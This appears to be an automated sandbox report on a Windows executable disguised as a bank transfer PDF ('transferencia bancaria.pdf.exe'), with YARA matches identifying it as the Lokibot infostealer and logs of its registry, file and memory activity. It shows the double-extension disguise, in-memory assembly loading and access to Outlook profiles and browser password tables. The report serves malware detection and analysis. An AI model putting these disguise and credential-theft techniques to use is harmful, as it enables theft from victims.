Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031A3B98	0_2_031A3B98
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031AC5F4	0_2_031AC5F4
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031A484F	0_2_031A484F
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031AEFD8	0_2_031AEFD8
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031AEFC8	0_2_031AEFC8
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031A6D23	0_2_031A6D23
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031A6CD0	0_2_031A6CD0

Source: transferencia bancaria.pdf.exe, 00000000.00000002.291185342.000000000445F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCollins.dll8 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe, 00000000.00000002.287796129.00000000033AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe, 00000000.00000002.295805972.00000000078E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe, 00000000.00000002.295985554.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCollins.dll8 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe, 00000000.00000000.249144170.0000000000F42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXwux.exe6 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe, 00000000.00000002.277771631.0000000003311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe	Binary or memory string: OriginalFilenameXwux.exe6 vs transferencia bancaria.pdf.exe

Source: transferencia bancaria.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: transferencia bancaria.pdf.exe	ReversingLabs: Detection: 12%
Source: transferencia bancaria.pdf.exe	Virustotal: Detection: 20%

Source: transferencia bancaria.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\transferencia bancaria.pdf.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@40/1

Source: transferencia bancaria.pdf.exe, 00000001.00000003.276188616.0000000000B77000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: transferencia bancaria.pdf.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: transferencia bancaria.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: transferencia bancaria.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: transferencia bancaria.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR

.NET source code contains potential unpacker

Source: transferencia bancaria.pdf.exe, Form1.cs	.Net Code: QWERTYSDFGHJK System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.transferencia bancaria.pdf.exe.f40000.0.unpack, Form1.cs	.Net Code: QWERTYSDFGHJK System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: transferencia bancaria.pdf.exe

Static PE information: 0xA9237CA5 [Wed Dec 3 11:06:13 2059 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 6.915983824184794

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: transferencia bancaria.pdf.exe

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
